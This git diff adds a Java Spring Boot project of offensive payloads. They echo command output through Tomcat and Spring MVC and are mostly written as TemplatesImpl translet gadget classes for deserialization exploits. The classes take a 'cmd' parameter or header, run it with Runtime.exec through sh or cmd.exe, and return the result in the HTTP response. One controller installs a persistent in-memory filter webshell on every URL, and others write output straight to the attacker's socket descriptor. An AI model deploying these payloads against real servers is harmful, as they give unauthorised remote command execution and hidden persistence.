req.getHeader("cmd"); + javax.servlet.http.HttpServletResponse rep = (javax.servlet.http.HttpServletResponse) req.getServletResponse(); + java.io.PrintWriter out = rep.getWriter(); + out.println(new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next()); + } + } catch (Exception e) { + e.printStackTrace(); + } + } + +} diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/EchoApplication.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/EchoApplication.java" new file mode 100644 index 0000000..c64a345 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/EchoApplication.java" @@ -0,0 +1,13 @@ +package com.firebasky.echo; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class EchoApplication { + + public static void main(String[] args) { + SpringApplication.run(EchoApplication.class, args); + } + +} diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/Alltomcat.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/Alltomcat.java" new file mode 100644 index 0000000..f471fbf --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/Alltomcat.java" @@ -0,0 +1,83 @@ +package com.firebasky.echo.controller; + +/** + * 局限 数据大小/tomcat7 + */ + +public class Alltomcat { + public Alltomcat() { + try{ + //传递命令的参数名 + String pass="cmd"; + //WebappClassLoaderBase + org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); + + //ApplicationContext + org.apache.catalina.Context context=webappClassLoaderBase.getResources().getContext(); + java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context"); + contextField.setAccessible(true); + org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(context); + + //StandardService + java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service"); + serviceField.setAccessible(true); + org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext); + + //Connector + org.apache.catalina.connector.Connector connectors[]=standardService.findConnectors(); + + //筛选Connector + for (int i=0;i threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null); + ThreadLocal threadLocalResponse = (ThreadLocal) lastServicedResponse.get(null); + javax.servlet.ServletRequest request = threadLocalRequest.get(); + javax.servlet.ServletResponse response = threadLocalResponse.get(); + + String cmd=request.getParameter("cmd"); + + if(cmd!=null){ + String[] cmds=null; + + if(System.getProperty("os.name").toLowerCase().contains("win")){ + cmds=new String[]{"cmd.exe", "/c", cmd}; + }else{ + cmds=new String[]{"/bin/bash", "-c", cmd}; + } + + java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + + java.io.Writer writer = response.getWriter(); + //目前得到的response是org.apache.catalina.connector.ResponseFacade,其封装了org.apache.catalina.connector.Response,要修改的usingWriter字段在后者中 + java.lang.reflect.Field r=response.getClass().getDeclaredField("response"); + r.setAccessible(true); + java.lang.reflect.Field usingWriter = Class.forName("org.apache.catalina.connector.Response").getDeclaredField("usingWriter"); + usingWriter.setAccessible(true); + usingWriter.set(r.get(response), Boolean.FALSE); + //解决报错。。 + writer.write(output); + writer.flush(); + writer.close(); + } + } + + }catch (Exception e){ + e.printStackTrace(); + } + return "test"; + } +} \ No newline at end of file diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/demo.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/demo.java" new file mode 100644 index 0000000..10f9e08 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/demo.java" @@ -0,0 +1,12 @@ +package com.firebasky.echo.controller; + +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; + +@RestController +public class demo { + @RequestMapping("/demo") + public void demo() throws InterruptedException { + new Alltomcat(); + } +} diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket.java" new file mode 100644 index 0000000..72e7f63 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket.java" @@ -0,0 +1,56 @@ +package com.firebasky.echo.controller; + +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; + +@RestController +public class socket { + @RequestMapping("/socket") + public String test(){ + try{ + //获取文件描述符 局限有点大 ubu 没有成功。。 + String[] cmd = new String[]{"/bin/sh","-c","inode=`cat /proc/net/tcp|awk '{if($10>0)print}'|awk '{print $3,$10}'|grep -i 22B8|awk '{print $2}'`;fd=`ls -l /proc/$PPID/fd|grep $inode|awk '{print $9}'`;echo -n $fd"}; + //22B8===> 8888 + // curl --local-port 8888 target + java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); + java.io.InputStreamReader isr = new java.io.InputStreamReader(in); + java.io.BufferedReader br = new java.io.BufferedReader(isr); + StringBuilder stringBuilder = new StringBuilder(); + String line; + while ((line = br.readLine()) != null){ + stringBuilder.append(line); + } + int fd = Integer.valueOf(stringBuilder.toString()).intValue(); + + + //获取命令执行结果 + cmd = new String[]{"/bin/sh","-c","whoami"}; + in = Runtime.getRuntime().exec(cmd).getInputStream(); + isr = new java.io.InputStreamReader(in); + br = new java.io.BufferedReader(isr); + stringBuilder = new StringBuilder(); + while ((line = br.readLine()) != null){ + stringBuilder.append(line); + } + String result = stringBuilder.toString(); + + //拼装成正常的HTTP响应 + String response = "HTTP/1.1 200 OK\r\n" + + "Content-Type: text/html\r\n" + + "Content-Length: " + result.length() + + "\r\n\r\n" + + result + + "\r\n\r\n"; + + //写入socket + java.lang.reflect.Constructor c=java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE}); + c.setAccessible(true); + java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)})); + os.write(response.getBytes()); + os.close(); + }catch (Exception e){ + e.printStackTrace(); + } + return "test"; + } +} \ No newline at end of file diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket_v2.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket_v2.java" new file mode 100644 index 0000000..07bb889 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket_v2.java" @@ -0,0 +1,145 @@ +package com.firebasky.echo.controller; + +import java.io.*; +import java.lang.reflect.Constructor; +import java.nio.file.Files; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.ArrayList; +import java.util.List; + +// 将被转换成字节的恶意类 +// 调用 com.weblogic.exp.XmlExp.say("id") +public class socket_v2 { + public socket_v2() throws Exception { + say("whoami"); + } + + public static String getInode() throws IOException { + File f1 = new File("/proc/thread-self/net/tcp"); + BufferedReader br = new BufferedReader(new FileReader(f1)); + String line, inode = ""; + + String result = ""; + while ((line = br.readLine()) != null) { + String[] lineArr = line.split("\\s+"); + String remoteAddr = lineArr[3]; + + result += line + "\n"; + // 按源IP/PORT过滤,在各层转发中会变,这个方法不准 + //https://tool.520101.com/wangluo/jinzhizhuanhuan/ + if (remoteAddr.contains("1748878")) { + inode = lineArr[10]; + if (!inode.equals("0")) { + break; + } + } + } + return inode; + } + + public static Boolean isClass(String className) { + try { + Class.forName(className); + return true; + } catch (ClassNotFoundException e) { + return false; + } + } + + public static FileDescriptor getFd(File file) throws Exception { + Class clazz = Class.forName("java.io.FileDescriptor"); + Constructor m = clazz.getDeclaredConstructor(new Class[]{Integer.TYPE}); + m.setAccessible(true); + + String[] fdArr = file.toString().split("/"); + String fdId = fdArr[fdArr.length - 1]; + FileDescriptor fd = (FileDescriptor) m.newInstance(new Object[]{new Integer(fdId)}); + return fd; + } + + public static File getFdFile(String inode) throws Exception { + String tmp = ""; + if (isClass("java.nio.file.Path")) { + File file = new File("/proc/thread-self/fd"); + File[] fs = file.listFiles(); + + for (File f : fs) { + Path path = Paths.get(f.toString(), new String[]{""}); + String link = Files.readSymbolicLink(path).toString(); + + if (link.contains(inode)) { + return f; + } + } + } else { + File file = new File("/proc"); + File[] fs = file.listFiles(); + + for (File f1 : fs) { + if (!f1.isDirectory()) continue; + if (!f1.canRead()) continue; + if (!f1.getPath().matches("/proc/[0-9]+")) continue; + + File f2 = new File(f1.getPath() + "/fd/"); + for (File f3 : f2.listFiles()) { + if (!f3.exists()) continue; + if (f3.isDirectory()) continue; + if (!f3.canWrite()) continue; + String id = f3.getName(); + if (id == null || id.length() == 0) continue; + try { + if (Long.parseLong(id) < 3) continue; + } catch (Exception e) { + continue; + } + String cmd = "readlink " + f3.getPath(); + BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd}).getInputStream())); + String line = br.readLine(); + if (line.contains(inode)) { + return f3; + } + } + } + } + + return new File(tmp); + } + + public static void writeFd(FileDescriptor fd, String body) throws Exception { + String response = "HTTP/1.1 200 OK\r\n" + + "Content-Type: text/html\r\n" + + "Content-Length: " + body.length() + + "\r\n\r\n" + + body + + "\r\n\r\n"; + + FileOutputStream os = new FileOutputStream(fd); + os.write(response.getBytes()); + } + + public static String ShellExec(String command) throws IOException { + + List cmds = new ArrayList(); + cmds.add("/bin/bash"); + cmds.add("-c"); + cmds.add(command); + ProcessBuilder pb = new ProcessBuilder(cmds); + pb.redirectErrorStream(true); + Process proc = pb.start(); + + byte[] out = new byte[1024 * 10]; + proc.getInputStream().read(out); + return new String(out); + } + + public static void say(String cmd) throws Exception { + String response = ShellExec(cmd); + + String inode = getInode(); + File file = getFdFile(inode); + FileDescriptor fd = getFd(file); + writeFd(fd, response); + } +} + diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/springmvc.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/springmvc.java" new file mode 100644 index 0000000..42e7503 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/springmvc.java" @@ -0,0 +1,37 @@ +package com.firebasky.echo.controller; + +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; +import org.springframework.web.context.request.RequestContextHolder; +import org.springframework.web.context.request.ServletRequestAttributes; + +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.io.BufferedReader; +import java.io.InputStreamReader; + +/** + * springmvc 利用 + */ +@RestController +public class springmvc { + @RequestMapping("/springmvc") + public void springmvc()throws Exception { + HttpServletRequest request =((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest(); + HttpServletResponse response = ((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getResponse(); + String resHeader=request.getParameter ( "cmd" ); + java.io.InputStream in = java.lang.Runtime.getRuntime().exec(resHeader).getInputStream(); + BufferedReader br = null; + br = new BufferedReader (new InputStreamReader(in, "GBK")); + String line; + StringBuilder sb = new StringBuilder(); + while ((line = br.readLine()) != null) { + sb.append(line); + sb.append("\n"); + } + java.io.PrintWriter out = new java.io.PrintWriter(response.getOutputStream()); + out.write(sb.toString ()); + out.flush(); + out.close(); + } +} diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/webshell/tomcat.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/webshell/tomcat.java" new file mode 100644 index 0000000..09b45de --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/webshell/tomcat.java" @@ -0,0 +1,130 @@ +package com.firebasky.echo.controller.webshell; + +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; + +/** + * 先访问两次webshell路由(第一次请求修改属性,第二次得到request注册filter) + * 然后带上cmd参数访问任意url即可 + * shiro不成功。。。 + */ + +@RestController +public class tomcat { + @RequestMapping("/webshell") + public String tomcat() { + try{ + //获取各字段 + java.lang.reflect.Field WRAP_SAME_OBJECT=Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT"); + Class applicationFilterChain = Class.forName("org.apache.catalina.core.ApplicationFilterChain"); + java.lang.reflect.Field lastServicedRequest = applicationFilterChain.getDeclaredField("lastServicedRequest"); + java.lang.reflect.Field lastServicedResponse = applicationFilterChain.getDeclaredField("lastServicedResponse"); + + //去掉final修饰符 + java.lang.reflect.Field modifiers = java.lang.reflect.Field.class.getDeclaredField("modifiers"); + modifiers.setAccessible(true); + modifiers.setInt(WRAP_SAME_OBJECT, WRAP_SAME_OBJECT.getModifiers() & ~java.lang.reflect.Modifier.FINAL); + modifiers.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~java.lang.reflect.Modifier.FINAL); + modifiers.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~java.lang.reflect.Modifier.FINAL); + + //设置允许访问 + WRAP_SAME_OBJECT.setAccessible(true); + lastServicedRequest.setAccessible(true); + lastServicedResponse.setAccessible(true); + + //如果是第一次请求,则修改各字段,否则获取cmd参数执行命令并返回结果 + if(!WRAP_SAME_OBJECT.getBoolean(null)){ + WRAP_SAME_OBJECT.setBoolean(null,true); + lastServicedRequest.set(null,new ThreadLocal()); + lastServicedResponse.set(null,new ThreadLocal()); + }else{ + ThreadLocal threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null); + javax.servlet.ServletRequest request = threadLocalRequest.get(); + + try { + javax.servlet.ServletContext servletContext=request.getServletContext(); + + //判断是否已有该名字的filter,有则不再添加 + if (servletContext.getFilterRegistration("webShell") == null) { + + class WebShell implements javax.servlet.Filter{ + + public void doFilter(javax.servlet.ServletRequest request, javax.servlet.ServletResponse response, javax.servlet.FilterChain chain) throws java.io.IOException, javax.servlet.ServletException { + System.out.println("filter"); + String cmd=request.getParameter("cmd"); + + if(cmd!=null) { + String[] cmds = null; + + if (System.getProperty("os.name").toLowerCase().contains("win")) { + cmds = new String[]{"cmd.exe", "/c", cmd}; + } else { + cmds = new String[]{"sh", "-c", cmd}; + } + + java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + java.io.Writer writer = response.getWriter(); + writer.write(output); + writer.flush(); + writer.close(); + } + + chain.doFilter(request, response); + } + } + + //因为门面模式的使用,此处servletContext实际是ApplicationContextFacade,需要提取ApplicationContext + java.lang.reflect.Field contextField=servletContext.getClass().getDeclaredField("context"); + contextField.setAccessible(true); + org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(servletContext); + + //获取ApplicationContext中的StandardContext + contextField=applicationContext.getClass().getDeclaredField("context"); + contextField.setAccessible(true); + org.apache.catalina.core.StandardContext standardContext= (org.apache.catalina.core.StandardContext) contextField.get(applicationContext); + + //修改state + java.lang.reflect.Field stateField=org.apache.catalina.util.LifecycleBase.class.getDeclaredField("state"); + stateField.setAccessible(true); + stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP); + + //注册filter + javax.servlet.FilterRegistration.Dynamic filterRegistration = servletContext.addFilter("webShell", new WebShell()); + filterRegistration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{"/*"}); + + //添加到filterConfigs + java.lang.reflect.Method filterStartMethod = org.apache.catalina.core.StandardContext.class.getMethod("filterStart"); + filterStartMethod.setAccessible(true); + filterStartMethod.invoke(standardContext, null); + + //调整filter位置 + org.apache.tomcat.util.descriptor.web.FilterMap[] filterMaps = standardContext.findFilterMaps(); + for (int i = 0; i < filterMaps.length; i++) { + if (filterMaps[i].getFilterName().equalsIgnoreCase("webShell")) { + org.apache.tomcat.util.descriptor.web.FilterMap filterMap = filterMaps[i]; + filterMaps[i] = filterMaps[0]; + filterMaps[0] = filterMap; + break; + } + } + + //恢复成LifecycleState.STARTE,否则会造成服务不可用 + stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTED); + + } + + }catch (Exception e){ + e.printStackTrace(); + } + + } + + }catch (Exception e){ + e.printStackTrace(); + } + + return "test"; + } +} \ No newline at end of file diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/springmvc.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/springmvc.java" new file mode 100644 index 0000000..4a6bdf1 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/springmvc.java" @@ -0,0 +1,47 @@ +package com.firebasky.echo.evilclass; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import org.springframework.web.context.request.RequestContextHolder; +import org.springframework.web.context.request.ServletRequestAttributes; + +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.io.BufferedReader; +import java.io.IOException; +import java.io.InputStreamReader; + +public class springmvc extends AbstractTranslet { + + public springmvc() throws IOException { + HttpServletRequest request =((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest(); + HttpServletResponse response = ((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getResponse(); + String resHeader=request.getParameter ( "cmd" ); + java.io.InputStream in = java.lang.Runtime.getRuntime().exec(resHeader).getInputStream(); + BufferedReader br = null; + br = new BufferedReader (new InputStreamReader(in, "GBK")); + String line; + StringBuilder sb = new StringBuilder(); + while ((line = br.readLine()) != null) { + sb.append(line); + sb.append("\n"); + } + java.io.PrintWriter out = new java.io.PrintWriter(response.getOutputStream()); + out.write(sb.toString ()); + out.flush(); + out.close(); + } + + @Override + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { + + } + + @Override + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { + + } +} diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat72.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat72.java" new file mode 100644 index 0000000..e916d20 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat72.java" @@ -0,0 +1,91 @@ +package com.firebasky.echo.evilclass; + + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import org.apache.coyote.Request; +import org.apache.tomcat.util.buf.ByteChunk; +import org.apache.tomcat.util.modeler.Registry; + +import javax.management.MBeanServer; +import java.io.InputStream; +import java.lang.reflect.Field; +import java.util.ArrayList; +import java.util.HashMap; +import java.util.Scanner; + +public class tomcat72 extends AbstractTranslet { + public tomcat72(){ + try{ + + MBeanServer mbeanServer = Registry.getRegistry((Object)null, (Object)null).getMBeanServer(); + Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor"); + field.setAccessible(true); + Object obj = field.get(mbeanServer); + + field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository"); + field.setAccessible(true); + obj = field.get(obj); + + field = Class.forName("com.sun.jmx.mbeanserver.Repository").getDeclaredField("domainTb"); + field.setAccessible(true); + HashMap obj2 = (HashMap)field.get(obj); + obj = ((HashMap)obj2.get("Catalina")).get("name=\"http-bio-8888\",type=GlobalRequestProcessor"); + + field = Class.forName("com.sun.jmx.mbeanserver.NamedObject").getDeclaredField("object"); + field.setAccessible(true); + obj = field.get(obj); + + field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource"); + field.setAccessible(true); + obj = field.get(obj); + + field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"); + field.setAccessible(true); + ArrayList obj3 = (ArrayList)field.get(obj); + + field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"); + field.setAccessible(true); + + boolean isLinux = true; + String osTyp = System.getProperty("os.name"); + if (osTyp != null && osTyp.toLowerCase().contains("win")) { + isLinux = false; + } + + for (int i = 0; i < obj3.size(); i++) { + Request obj4 = (Request) field.get(obj3.get(i)); + String username = obj4.getParameters().getParameter("username"); + if(username != null){ + String[] cmds = isLinux ? new String[]{"sh", "-c", username} : new String[]{"cmd.exe", "/c", username}; + InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); + Scanner s = new Scanner(in).useDelimiter("\\a"); + String output = ""; + while (s.hasNext()){ + output += s.next(); + } + + byte[] buf = output.getBytes(); + ByteChunk bc = new ByteChunk(); + bc.setBytes(buf, 0, buf.length); + obj4.getResponse().doWrite(bc); + break; + } + } + } catch (Exception e) { +// System.out.println("======================="); +// System.out.println(e); + } + } + + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { + + } + + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { + + } +} \ No newline at end of file diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat82.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat82.java" new file mode 100644 index 0000000..1b898dc --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat82.java" @@ -0,0 +1,86 @@ +package com.firebasky.echo.evilclass; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import org.apache.coyote.Request; +import org.apache.tomcat.util.buf.ByteChunk; +import org.apache.tomcat.util.modeler.Registry; +import javax.management.MBeanServer; +import java.io.InputStream; +import java.lang.reflect.Field; +import java.util.ArrayList; +import java.util.HashMap; +import java.util.Scanner; + +public class tomcat82 extends AbstractTranslet { + public tomcat82() { + try{ + MBeanServer mbeanServer = Registry.getRegistry((Object)null, (Object)null).getMBeanServer(); + Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor"); + field.setAccessible(true); + Object obj = field.get(mbeanServer); + + field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository"); + field.setAccessible(true); + obj = field.get(obj); + + field = Class.forName("com.sun.jmx.mbeanserver.Repository").getDeclaredField("domainTb"); + field.setAccessible(true); + HashMap obj2 = (HashMap)field.get(obj); + obj = ((HashMap)obj2.get("Catalina")).get("name=\"http-nio-8888\",type=GlobalRequestProcessor"); + + field = Class.forName("com.sun.jmx.mbeanserver.NamedObject").getDeclaredField("object"); + field.setAccessible(true); + obj = field.get(obj); + + field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource"); + field.setAccessible(true); + obj = field.get(obj); + + field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"); + field.setAccessible(true); + ArrayList obj3 = (ArrayList)field.get(obj); + + field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"); + field.setAccessible(true); + + boolean isLinux = true; + String osTyp = System.getProperty("os.name"); + if (osTyp != null && osTyp.toLowerCase().contains("win")) { + isLinux = false; + } + + for (int i = 0; i < obj3.size(); i++) { + Request obj4 = (Request) field.get(obj3.get(i)); + String username = obj4.getParameters().getParameter("cmd"); + if(username != null){ + String[] cmds = isLinux ? new String[]{"sh", "-c", username} : new String[]{"cmd.exe", "/c", username}; + InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); + Scanner s = new Scanner(in).useDelimiter("\\a"); + String output = ""; + while (s.hasNext()){ + output += s.next(); + } + + byte[] buf = output.getBytes(); + ByteChunk bc = new ByteChunk(); + bc.setBytes(buf, 0, buf.length); + obj4.getResponse().doWrite(bc); + break; + } + } + + } catch (Exception e){ + } + } + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { + + } + + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { + + } +} \ No newline at end of file diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v1.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v1.java" new file mode 100644 index 0000000..675b292 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v1.java" @@ -0,0 +1,98 @@ +package com.firebasky.echo.evilclass; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +/** + * 基于全局储存获取Tomcat Response + * + * ?cmd=whoami + * + * shiro可以使用,tomcat 7好像不行,并且限制了max header + */ +public class tomcat_v1 extends AbstractTranslet { + public tomcat_v1() { + try{ + //传递命令的参数名 + String pass="cmd"; + //WebappClassLoaderBase + org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); + + //ApplicationContext + org.apache.catalina.Context context=webappClassLoaderBase.getResources().getContext(); + java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context"); + contextField.setAccessible(true); + org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(context); + + //StandardService + java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service"); + serviceField.setAccessible(true); + org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext); + + //Connector + org.apache.catalina.connector.Connector connectors[]=standardService.findConnectors(); + + //筛选Connector + for (int i=0;i threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null); + ThreadLocal threadLocalResponse = (ThreadLocal) lastServicedResponse.get(null); + javax.servlet.ServletRequest request = threadLocalRequest.get(); + javax.servlet.ServletResponse response = threadLocalResponse.get(); + + String cmd=request.getParameter("cmd"); + + if(cmd!=null){ + String[] cmds=null; + + if(System.getProperty("os.name").toLowerCase().contains("win")){ + cmds=new String[]{"cmd.exe", "/c", cmd}; + }else{ + cmds=new String[]{"/bin/bash", "-c", cmd}; + } + + java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + + java.io.Writer writer = response.getWriter(); + //目前得到的response是org.apache.catalina.connector.ResponseFacade,其封装了org.apache.catalina.connector.Response,要修改的usingWriter字段在后者中 + java.lang.reflect.Field r=response.getClass().getDeclaredField("response"); + r.setAccessible(true); + java.lang.reflect.Field usingWriter = Class.forName("org.apache.catalina.connector.Response").getDeclaredField("usingWriter"); + usingWriter.setAccessible(true); + usingWriter.set(r.get(response), Boolean.FALSE); + //解决报错。。 + writer.write(output); + writer.flush(); + writer.close(); + } + } + + }catch (Exception e){ + e.printStackTrace(); + } + } + + @Override + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { + + } + + @Override + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { + + } +} diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v3.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v3.java" new file mode 100644 index 0000000..0c11e75 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v3.java" @@ -0,0 +1,77 @@ +package com.firebasky.echo.evilclass; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; + +/** + * header cmd=whoami + */ +public class tomcat_v3 extends AbstractTranslet { + public tomcat_v3() { + try { + java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context"); + java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service"); + java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req"); + java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null); + contextField.setAccessible(true); + serviceField.setAccessible(true); + requestField.setAccessible(true); + getHandlerMethod.setAccessible(true); + org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = + (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); + org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext()); + org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext); + org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors(); + for (int i=0;i 